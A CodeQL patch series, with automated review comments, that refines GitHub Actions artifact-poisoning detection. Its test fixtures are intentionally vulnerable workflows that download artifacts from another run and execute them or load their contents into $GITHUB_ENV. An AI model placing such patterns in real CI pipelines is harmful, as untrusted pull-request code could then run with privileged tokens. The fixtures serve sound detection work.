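Review bot: `GHRunArtifactDownloadStep` only matches when an `unzip`/`tar` line exists in the same or a later step, and its `getPath()` never looks at `--dir`, so the destination chosen by the download command itself is ignored. As far as I know `gh run download` already extracts the artifact, and the fixtures added in this commit pass `--dir foo`, so a workflow that downloads and then runs a file without an explicit unzip would not be reported. Consider dropping the unzip conjunct for this class and adding a branch such as `result = script.splitAt("\n").regexpCapture(".*gh\\s+run\\s+download.*--dir\\s+([^ ]+).*", 1)`. The characteristic predicate also requires the literal `github.event.workflow_run.id` on a line, so a run id passed through an environment variable (the `"${WORKFLOW_RUN_ID}"` form in the removed comment) is no longer matched; if that narrowing is intended it deserves a comment.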
@@ -45,6 +131,69 @@ class ArtifactDownloadStep extends Step { // gh api $url > "$name.zip" // unzip -d "$name" "$name.zip" // done - this.(Run).getScript().splitAt("\n").matches("%github.event.workflow_run.artifacts_url%") + this.getScript() = script and + script.splitAt("\n").matches("%github.event.workflow_run.artifacts_url%") and + ( + script.splitAt("\n").regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) + ) + } + + override string getPath() { + if + script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + then + result = script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) or + result = + this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + else result = "" } } + +abstract class PoisonableStep extends Step { } + +class CommandExecutionRunStep extends PoisonableStep, Run { + CommandExecutionRunStep() { + exists(ArtifactDownloadStep step | + step.getAFollowingStep() = this and + // Heuristic: + // Run step with a command starting with `./xxxx`, `sh xxxx`, `node xxxx`, ... + // eg: `./test.sh`, `sh test.sh`, `node test.js`, ... 
+ this.getScript() + .trim() + .regexpMatch(".*(./|(node|python|ruby|sh)\\s+)" + step.getPath() + ".*") + ) + } +} + +predicate writeToGithubEnv(Run run, string key, string value) { + exists(string script, string line | + script = run.getScript() and + line = script.splitAt("\n") and + key = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 2) and + value = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 3) + ) +} + +class EnvVarInjectionRunStep extends PoisonableStep, Run { + EnvVarInjectionRunStep() { + exists(ArtifactDownloadStep step, string value | + step.getAFollowingStep() = this and + // Heuristic: + // Run step with env var definition based on file content. + // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` + writeToGithubEnv(this, _, value) and + value.regexpMatch(".*cat\\s+.*") + ) + } +} +// TODO: Taint Step for output var definition based on file content. eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_OUTPUT` diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 330920852c1..a6d7e1b3cca 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -8,8 +8,8 @@ predicate writeToGithubEnvSink(DataFlow::Node exprNode, string key, string value exists(Expression expr, Run run, string script, string line | script = run.getScript() and line = script.splitAt("\n") and - key = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and - value = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 2) and + key = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 2) and + value = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 3) and expr = exprNode.asExpr() and run.getAnScriptExpr() = expr and value.indexOf(expr.getRawExpression()) > 0 
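Review bot: In `CommandExecutionRunStep` the pattern `".*(./|(node|python|ruby|sh)\\s+)" + step.getPath() + ".*"` leaves the dot in `./` unescaped and is applied to the whole trimmed script rather than per line. When `getPath()` is `""`, any script containing a character followed by `/` (a URL, an absolute path) satisfies it, which makes the heuristic much broader than the comment describes. If `.` does not match line terminators here (the Java regex default), a multi-line `run:` block cannot match at all, so real cases are missed. Something like `this.getScript().splitAt("\n").trim().regexpMatch(".*(\\./|(node|python|ruby|sh)\\s+)" + step.getPath() + ".*")` addresses both. `getPath()` is concatenated into the regex as-is, so a path containing regex metacharacters should be escaped or compared with a string operation instead.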
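Review bot: The updated pattern in `writeToGithubEnvSink` still ends in `>>\\s*\\$GITHUB_ENV`, so a line that redirects to a quoted `"$GITHUB_ENV"` is not recognised, assuming `regexpCapture` has to match the whole line. The greedy `(.*)` in group 3 also swallows the closing quote, so the following `(\")?` never takes part and `value` ends with a stray `"`. A lazy value group and optional quotes around the target would cover both: `"echo\\s+(\")?([^=]+)\\s*=(.*?)(\")?\\s*>>\\s*(\"|')?\\$GITHUB_ENV(\"|')?"`. The same expression is copied into `writeToGithubEnv` in ArtifactPoisoningQuery.qll in this commit; keeping it in one shared predicate would stop the two from drifting. The predicate starts before and continues after this hunk.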
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 5d38faa94df..bd9ec090f7f 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -14,13 +14,10 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery -from LocalJob job, ArtifactDownloadStep download, Step run +from LocalJob job, ArtifactDownloadStep downloadStep, PoisonableStep step where + // Workflow is privileged job.getWorkflow().isPrivileged() and - (run instanceof Run or run instanceof UsesStep) and - exists(int i, int j | - job.getStep(i) = download and - job.getStep(j) = run and - i < j - ) -select download, "Potential artifact poisoning." + // Download step is followed by a step that may be poisoned by the download + downloadStep.getAFollowingStep() = step +select downloadStep, "Potential artifact poisoning." diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index a8a0414dd9f..ea353609e24 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -351,6 +351,10 @@ sources | tj-actions/changed-files | * | output.unknown_files | PR changed files | | tj-actions/changed-files | * | output.unmerged_files | PR changed files | | tj-actions/verify-changed-files | * | output.changed-files | PR changed files | +| trilom/file-changes-action | * | output.files | PR changed files | +| trilom/file-changes-action | * | output.files_added | PR changed files | +| trilom/file-changes-action | * | output.files_modified | PR changed files | +| trilom/file-changes-action | * | output.files_removed | PR changed files | | tzkhan/pr-update-action | * | output.headMatch | | | xt0rted/slash-command-action | * | output.command-arguments | | summaries 
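Review bot: `job` is no longer related to `downloadStep` in the `where` clause of ArtifactPoisoning.ql; the removed `job.getStep(i) = download` was the only thing tying them together. As written, `job.getWorkflow().isPrivileged()` holds as soon as any privileged local job exists in the database, so download steps in unprivileged workflows appear to be reported as well. Binding them again, e.g. `job.getStep(_) = downloadStep and`, restores the privilege check. It would also help triage to mention the poisonable `step` in the `select` message, since the alert currently points only at the download.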
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml new file mode 100644 index 00000000000..f8d3736dba5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml @@ -0,0 +1,41 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/github-script@v6 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data)); + - name: Unzip + run: | + unzip sonarcloud-data.zip -d sonarcloud-data + ls -a sonarcloud-data + - name: Run command + run: + ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml similarity index 73% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml index 4755350f0fc..edcdc3b2064 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml 
@@ -27,8 +27,14 @@ jobs: artifact_id: matchArtifact.id, archive_format: 'zip', }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data)); + - name: Unzip + run: | + unzip sonarcloud-data.zip + ls -a sonarcloud-data - name: Run command - run: cmd - + run: + ./x.py build -j$(nproc) --compiler gcc --skip-build diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml similarity index 51% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml index 4d2a9774753..2f39bfd307a 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml @@ -10,10 +10,14 @@ jobs: Download: runs-on: ubuntu-latest steps: - - run: | - gh run download "${WORKFLOW_RUN_ID}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - uses: dawidd6/action-download-artifact@v2 + with: + name: artifact_name + workflow: wf.yml + path: foo - name: Run command - run: cmd + run: | + ./foo/cmd diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml similarity index 94% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml index 725038ab816..31fa3017551 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml @@ -15,7 +15,7 @@ jobs: name: artifact_name workflow: wf.yml - name: Run command - run: cmd + run: ./cmd 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml new file mode 100644 index 00000000000..0e7c6f97cf5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml @@ -0,0 +1,22 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Run command + run: ./foo/cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml new file mode 100644 index 00000000000..7a837ee42d2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml @@ -0,0 +1,21 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo + unzip artifact_name.zip -d bar + - name: Run command + run: | + ./bar/cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml new file mode 100644 index 00000000000..39ec063c7b6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml 
@@ -0,0 +1,21 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo + unzip foo/artifact_name.zip + - name: Run command + run: | + ./bar/cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml new file mode 100644 index 00000000000..afa3e15132e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml @@ -0,0 +1,25 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + artifacts_url=${{ github.event.workflow_run.artifacts_url }} + gh api "$artifacts_url" -q '.artifacts[] | [.name, .archive_download_url] | @tsv' | while read artifact + do + IFS=$'\t' read name url <<< "$artifact" + gh api $url > "$name.zip" + unzip -d "foo" "$name.zip" + done + - name: Run command + run: ./foo/cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml similarity index 89% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml index 26d342f7060..d3100d46edc 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml @@ -16,10 +16,10 @@ jobs: do IFS=$'\t' read name url <<< "$artifact" gh api $url > "$name.zip" - unzip -d "$name" "$name.zip" + unzip "$name.zip" done - name: Run command - run: cmd + run: ./cmd 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml new file mode 100644 index 00000000000..ca074428ccf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml @@ -0,0 +1,24 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Env Var Injection + run: | + echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV + + + + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected index 8113215481c..907979b88e7 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected 
@@ -1,4 +1,10 @@ -| .github/workflows/artifactpoisoning1.yml:13:9:30:6 | Uses Step | Potential artifact poisoning. | -| .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Potential artifact poisoning. | -| .github/workflows/artifactpoisoning3.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | -| .github/workflows/artifactpoisoning4.yml:13:9:21:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 5a572edf423..7bee36029d6 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -1,6 +1,7 @@ | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | 
.github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | From 3209378f453a2ad58038e8d74b77747d344f5013 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 5 Apr 2024 14:25:25 +0200 Subject: [PATCH 0149/1267] Remove TODO --- ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll | 1 - 1 file changed, 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index c64a7d0e338..8094235292a 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -196,4 +196,3 @@ class EnvVarInjectionRunStep extends PoisonableStep, Run { ) } } -// TODO: Taint Step for output var definition based on file content. eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_OUTPUT` From 2651e5a673137a923cd744dd69dc3d8e937d46e5 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 12:52:10 +0200 Subject: [PATCH 0150/1267] Improve Artifact poisoning related queries --- ql/lib/codeql/actions/Ast.qll | 53 ++++++++++ .../codeql/actions/dataflow/FlowSources.qll | 10 ++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 23 ++++- .../dataflow/internal/DataFlowPrivate.qll | 6 +- .../security/ArtifactPoisoningQuery.qll | 98 +++++++++++++++---- ql/lib/ext/marocchino_on_artifact.model.yml | 6 ++ ...bers-in-action_download-artifact.model.yml | 7 ++ ql/test/library-tests/test.expected | 16 +++ ql/test/library-tests/test.ql | 29 ++++++ .../.github/workflows/artifactpoisoning1.yml | 89 +++++++++++++++++ .../.github/workflows/artifactpoisoning2.yml | 23 +++++ .../Security/CWE-094/CodeInjection.expected | 8 ++ .../CWE-094/PrivilegedCodeInjection.expected | 10 ++ 13 files changed, 352 insertions(+), 26 deletions(-) create mode 100644 ql/lib/ext/marocchino_on_artifact.model.yml create mode 100644 ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 720fd29feb0..a9fe35259c5 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -18,6 +18,59 @@ module Utils { "toJSON\\(\\s*" + regex + "\\s*\\)" ] } + + bindingset[line, var] + predicate extractAssignment(string line, string var, string key, string value) { + exists(string assignment | + ( + assignment = + line.regexpCapture("(echo|Write-Output)\\s+\"(.*)\"\\s*>>\\s*(\"|')?\\$GITHUB_" + + var.toUpperCase() + "(\"|')?", 2) + .regexpReplaceAll("^\"", "") + .regexpReplaceAll("\"$", "") or + assignment = + line.regexpCapture("(echo|Write-Output)\\s+'(.*)'\\s*>>\\s*(\"|')?\\$GITHUB_" + + var.toUpperCase() + "(\"|')?", 2) + .regexpReplaceAll("^'", "") + .regexpReplaceAll("'$", "") or + assignment = + line.regexpCapture("(echo|Write-Output)\\s+([^'\"]*)\\s*>>\\s*(\"|')?\\$GITHUB_" + + var.toUpperCase() + "(\"|')?", 2) + ) and + key = assignment.splitAt("=", 0).trim() and + value = assignment.splitAt("=", 1).trim() + or + ( + assignment = + line.regexpCapture("(echo|Write-Output)\\s+\"::set-" + var.toLowerCase() + + "\\s+name=(.*)\"", 2).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") or + assignment = + line.regexpCapture("(echo|Write-Output)\\s+'::set-" + var.toLowerCase() + "\\s+name=(.*)'", + 2).regexpReplaceAll("^'", "").regexpReplaceAll("'$", "") or + assignment = + line.regexpCapture("(echo|Write-Output)\\s+::set-" + var.toLowerCase() + "\\s+name=(.*)", + 2) + ) and + key = assignment.splitAt("::", 0).trim() and + value = assignment.splitAt("::", 1).trim() + ) + } + + predicate writeToGitHubEnv(Run run, string key, string value) { + exists(string script, string line | + script = run.getScript() and + line = script.splitAt("\n") and + Utils::extractAssignment(line, "ENV", key, value) + ) + } + + predicate writeToGitHubOutput(Run run, string key, string value) { + exists(string script, string line | + script = run.getScript() and + line = script.splitAt("\n") and + Utils::extractAssignment(line, "OUTPUT", key, value) + ) + } } class AstNode instanceof AstNodeImpl { 
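Review bot: In `extractAssignment`, `value = assignment.splitAt("=", 1).trim()` keeps only the text between the first and second `=`, so any assigned value that itself contains `=` is truncated. For the artifact heuristics this can drop the closing `)` of a command substitution, so later checks on `value` may silently fail to match and the step goes unreported. Splitting on the first `=` only avoids that: `key = assignment.regexpCapture("([^=]+)=(.*)", 1).trim() and` / `value = assignment.regexpCapture("([^=]+)=(.*)", 2).trim()`. A short QLDoc on the predicate listing the accepted forms (`>> $GITHUB_<VAR>` and `::set-<var> name=`) and noting that `var` is case-normalised would make the three near-identical regexes easier to maintain.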
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 699b5f6f6c3..c0e0e759120 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -2,6 +2,7 @@ private import actions private import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.Ast::Utils as Utils +private import codeql.actions.security.ArtifactPoisoningQuery /** * A data flow source. @@ -157,3 +158,12 @@ private class CompositeActionInputSource extends RemoteFlowSource { override string getSourceType() { result = "Composite action input" } } + +/** + * A downloadeded artifact. + */ +private class ArtifactToOptionSource extends RemoteFlowSource { + ArtifactToOptionSource() { this.asExpr() instanceof ArtifactDownloadStep } + + override string getSourceType() { result = "Step output from Artifact" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 34357816812..242cbcf9a31 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -6,6 +6,8 @@ private import actions private import codeql.util.Unit private import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.Ast::Utils as Utils +private import codeql.actions.security.ArtifactPoisoningQuery /** * A unit class for adding additional taint steps. 
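Review bot: The QLDoc on `ArtifactToOptionSource` reads "A downloadeded artifact.", which is a typo and does not say what the source node actually is. The characteristic predicate makes the download step itself the source (`this.asExpr() instanceof ArtifactDownloadStep`), while the class name and `getSourceType()` ("Step output from Artifact") suggest a step output. I would reword the comment to something like `/** An artifact download step, treated as a source of untrusted data. */` and align the source-type string with it, so alert messages describe the node that is reported.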
@@ -40,12 +42,25 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo exists(string script, string line | script = run.getScript() and line = script.splitAt("\n") and - ( - output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or - output = line.regexpCapture(".*echo\\s*\"(.*)=.*\\s*>>\\s*(\")?\\$GITHUB_OUTPUT.*", 1) - ) and + Utils::extractAssignment(line, "OUTPUT", output, _) and line.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and succ.asExpr() = run ) } + +/** + * A downloaded artifact that gets assigned to a Run step output. + * - uses: actions/download-artifact@v2 + * - run: echo "::set-output name=id::$(>\\s*\\$GITHUB_ENV", 2) and - value = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 3) - ) -} - class EnvVarInjectionRunStep extends PoisonableStep, Run { EnvVarInjectionRunStep() { exists(ArtifactDownloadStep step, string value | @@ -191,8 +247,10 @@ class EnvVarInjectionRunStep extends PoisonableStep, Run { // Heuristic: // Run step with env var definition based on file content. // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` - writeToGithubEnv(this, _, value) and - value.regexpMatch(".*cat\\s+.*") + // eg: `echo "sha=$(> $GITHUB_ENV` + Utils::writeToGitHubEnv(this, _, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) } } diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml new file mode 100644 index 00000000000..9f621758cff --- /dev/null +++ b/ql/lib/ext/marocchino_on_artifact.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["marocchino/on_artifact", "*", "output.*", "Downloaded artifact"] 
diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml new file mode 100644 index 00000000000..52c478dd1d4 --- /dev/null +++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "Downloaded artifact"] + diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index ea353609e24..8b5f3e7184b 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -329,7 +329,9 @@ sources | jitterbit/get-changed-files | * | output.removed | PR changed files | | jitterbit/get-changed-files | * | output.renamed | PR changed files | | khan/pull-request-comment-trigger | * | output.comment_body | Comment body | +| marocchino/on_artifact | * | output.* | Downloaded artifact | | octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | Foo | +| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | | tj-actions/branch-names | * | output.current_branch | PR current branch | | tj-actions/branch-names | * | output.head_ref_branch | PR head branch | | tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | 
